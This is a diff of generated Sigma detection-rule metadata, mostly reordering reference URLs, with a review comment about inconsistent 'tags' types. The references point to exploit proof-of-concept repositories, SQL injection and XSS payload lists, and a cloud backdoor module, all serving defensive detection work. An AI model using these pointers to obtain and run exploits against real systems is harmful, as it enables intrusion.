"https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html", + "https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html", "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_s3_data_management_tampering.yml" ], "tags": [ 
@@ -71033,8 +71057,8 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py", "https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html", + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ecs_task_definition_backdoor.yml" ], "tags": [ @@ -71429,8 +71453,8 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html", "https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html", + "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_susp_saml_activity.yml" ], "tags": [ @@ -71616,9 +71640,9 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ + "https://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/", "https://github.com/Lifka/hacking-resources/blob/c2ae355d381bd0c9f0b32c4ead049f44e5b1573f/cloud-hacking-cheat-sheets.md", "https://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html", - "https://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_enum_buckets.yml" ], "tags": [ 
@@ -71849,9 +71873,9 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html", - "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml", "https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html", + "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml", + "https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml" ], "tags": [ @@ -71989,8 +72013,8 @@ "logsource.category": "No established category", "logsource.product": "aws", "refs": [ - "https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html", "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/", + "https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_passed_role_to_glue_development_endpoint.yml" ], "tags": [ 
@@ -72843,8 +72867,8 @@
 "logsource.category": "No established category",
 "logsource.product": "azure",
 "refs": [
- "https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml",
 "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
+ "https://github.com/elastic/detection-rules/blob/065bf48a9987cd8bd826c098a30ce36e6868ee46/rules/integrations/azure/impact_kubernetes_pod_deleted.toml",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_pods_deleted.yml"
 ],
 "tags": [
@@ -73064,11 +73088,11 @@
 "logsource.category": "No established category",
 "logsource.product": "azure",
 "refs": [
+ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
 "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/",
 "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
 "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
 "https://attack.mitre.org/matrices/enterprise/cloud/",
- "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml"
 ],
 "tags": [
@@ -74003,11 +74027,11 @@
 "logsource.category": "No established category",
 "logsource.product": "azure",
 "refs": [
+ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
 "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/",
 "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
 "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
 "https://attack.mitre.org/matrices/enterprise/cloud/",
- "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml"
 ],
 "tags": [
@@ -74065,11 +74089,11 @@
 "logsource.category": "No established category",
 "logsource.product": "azure",
 "refs": [
+ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
 "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/",
 "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
 "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
 "https://attack.mitre.org/matrices/enterprise/cloud/",
- "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_role_access.yml"
 ],
 "tags": [
@@ -74211,11 +74235,11 @@
 "logsource.category": "No established category",
 "logsource.product": "azure",
 "refs": [
+ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
 "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/",
 "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
 "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
 "https://attack.mitre.org/matrices/enterprise/cloud/",
- "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_container_registry_created_or_deleted.yml"
 ],
 "tags": [
@@ -74271,8 +74295,8 @@
 "logsource.category": "No established category",
 "logsource.product": "azure",
 "refs": [
- "https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml",
 "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
+ "https://github.com/elastic/detection-rules/blob/da3852b681cf1a33898b1535892eab1f3a76177a/rules/integrations/azure/defense_evasion_kubernetes_events_deleted.toml",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_events_deleted.yml"
 ],
 "tags": [
@@ -74340,10 +74364,10 @@
 "logsource.category": "No established category",
 "logsource.product": "azure",
 "refs": [
- "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
 "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/",
 "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
 "https://kubernetes.io/docs/concepts/workloads/controllers/job/",
+ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cronjob.yml"
 ],
 "tags": [
@@ -74426,11 +74450,11 @@
 "logsource.category": "No established category",
 "logsource.product": "azure",
 "refs": [
+ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
 "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/",
 "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
 "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
 "https://attack.mitre.org/matrices/enterprise/cloud/",
- "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml"
 ],
 "tags": [
@@ -74991,11 +75015,11 @@
 "logsource.category": "No established category",
 "logsource.product": "azure",
 "refs": [
+ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
 "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/",
 "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
 "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
 "https://attack.mitre.org/matrices/enterprise/cloud/",
- "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_network_policy_change.yml"
 ],
 "tags": [
@@ -75020,11 +75044,11 @@
 "logsource.category": "No established category",
 "logsource.product": "azure",
 "refs": [
+ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
 "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/",
 "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
 "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
 "https://attack.mitre.org/matrices/enterprise/cloud/",
- "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml"
 ],
 "tags": [
@@ -75157,8 +75181,8 @@
 "logsource.category": "proxy",
 "logsource.product": "No established product",
 "refs": [
- "https://twitter.com/jhencinski/status/1102695118455349248",
 "https://isc.sans.edu/forums/diary/Investigating+Microsoft+BITS+Activity/23281/",
+ "https://twitter.com/jhencinski/status/1102695118455349248",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_bitsadmin_susp_tld.yml"
 ],
 "tags": [
@@ -75483,8 +75507,8 @@
 "logsource.product": "No established product",
 "refs": [
 "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/",
- "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/",
 "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/",
+ "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_telegram_api.yml"
 ],
 "tags": [
@@ -75568,11 +75592,11 @@
 "logsource.category": "proxy",
 "logsource.product": "No established product",
 "refs": [
+ "https://networkraptor.blogspot.com/2015/01/user-agent-strings.html",
 "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules",
 "https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents",
 "http://www.botopedia.org/search?searchword=scan&searchphrase=all",
 "https://perishablepress.com/blacklist/ua-2013.txt",
- "https://networkraptor.blogspot.com/2015/01/user-agent-strings.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_malware.yml"
 ],
 "tags": [
@@ -75716,8 +75740,8 @@
 "logsource.category": "proxy",
 "logsource.product": "No established product",
 "refs": [
- "https://github.com/xmrig/xmrig/blob/427b6516e0550200c17ca28675118f0fffcc323f/src/version.h",
 "https://github.com/xmrig/xmrig/blob/da22b3e6c45825f3ac1f208255126cb8585cd4fc/src/base/kernel/Platform_win.cpp#L65",
+ "https://github.com/xmrig/xmrig/blob/427b6516e0550200c17ca28675118f0fffcc323f/src/version.h",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ua_cryptominer.yml"
 ],
 "tags": [
@@ -75770,8 +75794,8 @@
 "logsource.category": "proxy",
 "logsource.product": "No established product",
 "refs": [
- "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html",
 "https://twitter.com/craiu/status/1167358457344925696",
+ "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_ios_implant.yml"
 ],
 "tags": [
@@ -75915,8 +75939,8 @@
 "logsource.category": "proxy",
 "logsource.product": "No established product",
 "refs": [
- "https://www.advanced-ip-scanner.com/",
 "https://www.advanced-port-scanner.com/",
+ "https://www.advanced-ip-scanner.com/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_adv_ip_port_scanner_upd_check.yml"
 ],
 "tags": [
@@ -75949,10 +75973,10 @@
 "logsource.category": "proxy",
 "logsource.product": "No established product",
 "refs": [
- "https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf",
 "https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap",
 "https://www.spamhaus.org/statistics/tlds/",
 "https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/",
+ "https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_download_susp_tlds_blacklist.yml"
 ],
 "tags": [
@@ -76018,8 +76042,8 @@
 "logsource.category": "proxy",
 "logsource.product": "No established product",
 "refs": [
- "https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100",
 "https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile",
+ "https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/proxy/proxy_cobalt_amazon.yml"
 ],
 "tags": [
@@ -76427,8 +76451,8 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://twitter.com/wugeej/status/1369476795255320580",
 "https://paper.seebug.org/1495/",
+ "https://twitter.com/wugeej/status/1369476795255320580",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_21978_vmware_view_planner_exploit.yml"
 ],
 "tags": [
@@ -76488,9 +76512,9 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://twitter.com/jas502n/status/1321416053050667009?s=20",
- "https://twitter.com/sudo_sudoka/status/1323951871078223874",
 "https://isc.sans.edu/diary/26734",
+ "https://twitter.com/sudo_sudoka/status/1323951871078223874",
+ "https://twitter.com/jas502n/status/1321416053050667009?s=20",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_14882_weblogic_exploit.yml"
 ],
 "tags": [
@@ -76524,10 +76548,10 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
+ "https://github.com/TesterCC/exp_poc_library/blob/master/exp_poc/CVE-2021-26084_Confluence_OGNL_injection/CVE-2021-26084.md",
+ "https://mraddon.blog/2017/03/20/confluence-trick-to-create-pages-from-blueprint-templates/",
 "https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md",
 "https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html",
- "https://mraddon.blog/2017/03/20/confluence-trick-to-create-pages-from-blueprint-templates/",
- "https://github.com/TesterCC/exp_poc_library/blob/master/exp_poc/CVE-2021-26084_Confluence_OGNL_injection/CVE-2021-26084.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_26084_confluence_rce_exploit.yml"
 ],
 "tags": [
@@ -76593,8 +76617,8 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/",
 "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/",
+ "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_exploitation_hafnium.yml"
 ],
 "tags": [
@@ -76627,8 +76651,8 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/",
 "https://www.anquanke.com/post/id/226029",
+ "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_solarwinds_supernova_webshell.yml"
 ],
 "tags": [
@@ -76724,8 +76748,8 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://github.com/search?q=CVE-2021-43798",
 "https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/",
+ "https://github.com/search?q=CVE-2021-43798",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_43798_grafana.yml"
 ],
 "tags": [
@@ -76780,11 +76804,11 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://twitter.com/sec715/status/1373472323538362371",
 "https://twitter.com/Al1ex4/status/1382981479727128580",
 "https://github.com/murataydemir/CVE-2021-27905",
- "https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186",
+ "https://twitter.com/sec715/status/1373472323538362371",
 "https://nsfocusglobal.com/apache-solr-arbitrary-file-read-and-ssrf-vulnerability-threat-alert/",
+ "https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_27905_apache_solr_exploit.yml"
 ],
 "tags": [
@@ -76818,9 +76842,9 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
+ "https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/",
 "https://www.yang99.top/index.php/archives/82/",
 "https://github.com/vnhacker1337/CVE-2022-27925-PoC",
- "https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_27925_exploit.yml"
 ],
 "tags": [
@@ -76854,10 +76878,10 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://twitter.com/_0xf4n9x_/status/1572052954538192901",
- "https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/",
 "https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html",
+ "https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/",
 "https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/",
+ "https://twitter.com/_0xf4n9x_/status/1572052954538192901",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_36804_atlassian_bitbucket_command_injection.yml"
 ],
 "tags": [
@@ -76893,10 +76917,10 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://github.com/payloadbox/sql-injection-payload-list",
- "https://brightsec.com/blog/sql-injection-payloads/",
 "https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/",
 "https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/",
+ "https://brightsec.com/blog/sql-injection-payloads/",
+ "https://github.com/payloadbox/sql-injection-payload-list",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_sql_injection_in_access_logs.yml"
 ],
 "tags": "No established tags"
@@ -77021,8 +77045,8 @@
 "logsource.category": "No established category",
 "logsource.product": "No established product",
 "refs": [
- "https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps",
 "https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/",
+ "https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_nginx_core_dump.yml"
 ],
 "tags": [
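Review bot: The `tags` key changes type between objects: the sql-injection entry in the second hunk on this line closes with `"tags": "No established tags"`, while the neighbouring entries use `"tags": [`, so a consumer iterating over `tags` will iterate over characters of the sentinel string for some rules and over an array for others. The same pattern is visible in later hunks (the xss rule and the compliance rules). Emitting `"tags": []` or omitting the key when a rule has none keeps one type per key; as with the `logsource.category` and `logsource.product` sentinels, this is presumably set by the generator rather than by hand, so the fix belongs there.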
@@ -77123,8 +77147,8 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1",
 "https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html",
+ "https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_source_code_enumeration.yml"
 ],
 "tags": [
@@ -77148,10 +77172,10 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://support.f5.com/csp/article/K52145254",
 "https://www.criticalstart.com/f5-big-ip-remote-code-execution-exploit/",
 "https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/",
 "https://twitter.com/yorickkoster/status/1279709009151434754",
+ "https://support.f5.com/csp/article/K52145254",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2020_5902_f5_bigip.yml"
 ],
 "tags": [
@@ -77184,9 +77208,9 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://www.vmware.com/security/advisories/VMSA-2021-0002.html",
 "https://f5.pm/go-59627.html",
 "https://swarm.ptsecurity.com/unauth-rce-vmware",
+ "https://www.vmware.com/security/advisories/VMSA-2021-0002.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_21972_vsphere_unauth_rce_exploit.yml"
 ],
 "tags": [
@@ -77252,9 +77276,9 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://github.com/rapid7/metasploit-framework/pull/17407",
- "https://github.com/0xf4n9x/CVE-2022-46169",
 "https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf",
+ "https://github.com/0xf4n9x/CVE-2022-46169",
+ "https://github.com/rapid7/metasploit-framework/pull/17407",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_46169_cacti_exploitation_attempt.yml"
 ],
 "tags": [
@@ -77288,12 +77312,12 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b",
- "https://github.com/tangxiaofeng7/apache-log4j-poc",
- "https://twitter.com/shutingrz/status/1469255861394866177?s=21",
- "https://www.lunasec.io/docs/blog/log4j-zero-day/",
- "https://news.ycombinator.com/item?id=29504755",
 "https://github.com/YfryTchsGD/Log4jAttackSurface",
+ "https://github.com/tangxiaofeng7/apache-log4j-poc",
+ "https://www.lunasec.io/docs/blog/log4j-zero-day/",
+ "https://twitter.com/shutingrz/status/1469255861394866177?s=21",
+ "https://news.ycombinator.com/item?id=29504755",
+ "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_44228_log4j_fields.yml"
 ],
 "tags": [
@@ -77383,10 +77407,10 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/",
- "https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md",
- "https://twitter.com/httpvoid0x2f/status/1532924261035384832",
 "https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/",
+ "https://twitter.com/httpvoid0x2f/status/1532924261035384832",
+ "https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md",
+ "https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_java_payload_in_access_logs.yml"
 ],
 "tags": [
@@ -77445,8 +77469,8 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://github.com/payloadbox/xss-payload-list",
 "https://portswigger.net/web-security/cross-site-scripting/contexts",
+ "https://github.com/payloadbox/xss-payload-list",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_xss_in_access_logs.yml"
 ],
 "tags": "No established tags"
@@ -77536,8 +77560,8 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://blog.assetnote.io/2021/11/02/sitecore-rce/",
 "https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776",
+ "https://blog.assetnote.io/2021/11/02/sitecore-rce/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2021_42237_sitecore_report_ashx.yml"
 ],
 "tags": [
@@ -77570,8 +77594,8 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://github.com/apache/spark/pull/36315/files",
 "https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html",
+ "https://github.com/apache/spark/pull/36315/files",
 "https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_cve_2022_33891_spark_shell_command_injection.yml"
 ],
@@ -77606,8 +77630,8 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92",
 "https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb",
+ "https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92",
 "https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_susp_useragents.yml"
 ],
@@ -77741,9 +77765,9 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
+ "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html",
 "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1",
 "https://youtu.be/5mqid-7zp8k?t=2231",
- "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_proxyshell.yml"
 ],
 "tags": [
@@ -77776,9 +77800,9 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
+ "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html",
 "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1",
 "https://youtu.be/5mqid-7zp8k?t=2231",
- "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/web/web_exchange_proxyshell_successful.yml"
 ],
 "tags": [
@@ -77826,12 +77850,12 @@
 "logsource.category": "webserver",
 "logsource.product": "No established product",
 "refs": [
- "https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b",
- "https://github.com/tangxiaofeng7/apache-log4j-poc",
- "https://twitter.com/shutingrz/status/1469255861394866177?s=21",
- "https://www.lunasec.io/docs/blog/log4j-zero-day/",
- "https://news.ycombinator.com/item?id=29504755",
 "https://github.com/YfryTchsGD/Log4jAttackSurface",
+ "https://github.com/tangxiaofeng7/apache-log4j-poc",
+ "https://www.lunasec.io/docs/blog/log4j-zero-day/",
